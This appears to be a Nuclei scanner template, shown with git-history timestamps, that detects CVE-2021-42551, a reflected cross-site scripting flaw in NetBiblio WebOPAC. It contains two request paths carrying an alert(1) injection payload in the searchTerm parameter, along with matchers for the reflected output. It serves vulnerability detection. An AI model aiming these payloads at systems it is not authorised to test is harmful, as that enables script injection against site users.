nuclei-templates/http/cves/2021/CVE-2021-42551.yaml

63 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2021-42551
info:
name: NetBiblio WebOPAC - Cross-Site Scripting
author: compr00t
severity: medium
2022-02-28 16:05:59 +00:00
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/compr00t/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-42551
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00124
epss-percentile: 0.4686
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: alcoda
product: netbiblio
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,xss,netbiblio,alcoda
http:
- method: GET
path:
- '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x'
- '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F'
host-redirects: true
max-redirects: 3
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SearchTerm: 'x'+alert(1)+'x',"
- "SearchTerm: 'x\\\\'+alert(1),//',"
condition: or
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "NetBiblio"
- type: status
status:
- 200
# digest: 4a0a0047304502206dd93003af5b16b41ee56291ab005c6c3f16f409d1d15021ba955b2ce382f648022100faabadb8a53c37f1b7f22013ffe65ca71fbd83d105f2621c62226db40d7ae45d:922c64590222798bb761d5b6d8e72950